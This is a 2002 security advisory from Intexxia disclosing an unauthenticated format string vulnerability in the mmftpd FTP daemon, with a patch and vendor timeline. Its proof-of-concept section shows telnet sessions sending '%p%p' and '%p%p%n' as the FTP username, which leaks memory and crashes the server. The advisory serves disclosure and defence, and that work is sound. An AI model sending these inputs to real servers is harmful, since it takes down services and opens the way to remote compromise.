-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
________________________________________________________________________
SECURITY ADVISORY INTEXXIA(c)
04 06 2002 ID #1053-040602
________________________________________________________________________
TITLE : mmftpd FTP Daemon Format String Vulnerability
CREDITS : Guillaume Pelat / INTEXXIA
________________________________________________________________________
SYSTEM AFFECTED
===============
mmftpd <= 0.0.7
________________________________________________________________________
DESCRIPTION
===========
"mmftpd is a secure FTP server that runs as a normal user, and
supports virtual users only. Each user may have specific permissions,
including the maximum home directory size limit and download/upload
speeds. It runs on both BSD and Linux systems, and is ideal for a setup
with many Web virtual host customers. It was written from scratch, with
no borrowed code."
The Laboratory intexxia found a remotely exploitable format
string vulnerability in the mmftpd FTP deamon .
________________________________________________________________________
DETAILS
=======
There is a format string vulnerability in the 'mmsyslog()'
function of the 'mmftpd ' program. This function acts like 'vsyslog()'
if '__GLIBC__' is defined. It calls the 'syslog(3)' function with a
format string that can be defined by a remote user. It is not necessary
to authenticate to exploit this vulnerability.
Successful exploitation of this flaw can allow a remote user to obtain
a local account on the target machine.
________________________________________________________________________
PROOF OF CONCEPT
================
test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p
331 Password required for this user
PASS foo
530 Invalid login
In the log file :
mmftpd[1875]: 3CFC80CF Failed login for 0x80598800x80ae73c (unexisting)
test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p%n
331 Password required for this user
PASS foo
Connection closed by foreign host.
test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused
________________________________________________________________________
SOLUTION
========
The following patch corrects this issue :
diff -dru mmftpd-0.0.7/mmlib/mmlog.c mmftpd-0.0.7.fixed/mmlib/mmlog.c
- --- mmftpd-0.0.7/mmlib/mmlog.c Mon May 13 08:20:13 2002
+++ mmftpd-0.0.7.fixed/mmlib/mmlog.c Tue Jun 4 11:25:03 2002
@@ -70,7 +70,7 @@
va_start(lst, fmt);
vsnprintf(buf, 1023, fmt, lst);
va_end(lst);
- - syslog(LOG_NOTICE, buf);
+ syslog(LOG_NOTICE, "%s", buf);
}
}
A new version including this patch is available at the following URL :
http://mmondor.gobot.ca/software/linux/mmftpd-0.0.8.tar.gz
________________________________________________________________________
VENDOR STATUS
=============
04-06-2002 : This bulletin was sent to Matthew Mondor.
05-06-2002 : Matthew was very reactive and confirmed the
vulnerability. He released a new version.
________________________________________________________________________
LEGALS
======
mmftpd is registered trademark.
Intexxia provides this information as a public service and "as
is". Intexxia will not be held accountable for any damage or distress
caused by the proper or improper usage of these materials.
(c) intexxia 2002. This document is property of intexxia. Feel
free to use and distribute this material as long as credit is given to
intexxia and the author.
________________________________________________________________________
CONTACT
=======
CERT intexxia cert@intexxia.com
INTEXXIA http://www.intexxia.com
171, av. Georges Clemenceau Standard : +33 1 55 69 49 10
92024 Nanterre Cedex - France Fax : +33 1 55 69 78 80
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
iQA/AwUBPQdFek2N8BNyNDXLEQKEpACgt/bLhZ6ahg8ryeQZySgsAwfgrN0AoN1t
+RZxkiJQjPqx2M/035bKlMSq
=pRJF
-----END PGP SIGNATURE-----
